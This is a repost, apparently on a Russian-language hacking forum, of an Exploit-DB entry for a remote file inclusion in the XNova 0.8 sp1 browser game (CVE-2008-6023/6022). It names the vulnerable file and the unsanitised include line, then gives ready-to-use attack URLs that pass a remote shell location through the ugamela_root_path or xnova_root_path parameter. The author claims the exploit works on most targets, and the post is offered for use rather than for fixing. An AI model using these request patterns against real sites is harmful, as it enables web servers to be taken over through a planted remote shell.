Exploit XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6254
Проверка EDB
  1. Пройдено
Автор
NUCLEARHAXOR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6023 cve-2008-6022
Дата публикации
2008-08-17
Код:
##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: [email protected]

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------

FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r

##################################################################################################################################

# milw0rm.com [2008-08-17]
 
Источник
www.exploit-db.com

Похожие темы